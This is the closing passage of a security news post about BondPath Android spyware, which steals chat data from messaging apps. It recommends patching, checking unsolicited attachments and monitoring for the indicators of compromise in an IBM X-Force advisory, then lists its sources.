To defend their organizations against BondPath and similar mobile threats that originate in official app stores, security teams should keep applications and operating systems running at the current patch level, verify the legitimacy of unsolicited email attachments through a separate channel, and monitor their IT environment for the indicators of compromise (IoCs) listed in the IBM X-Force Exchange threat advisory.

Sources: Fortinet, Verizon, Malwarebytes, Malwarebytes(1)

The post New BondPath Android Spyware Retrieves Chat Data From Messaging Apps appeared first on Security Intelligence.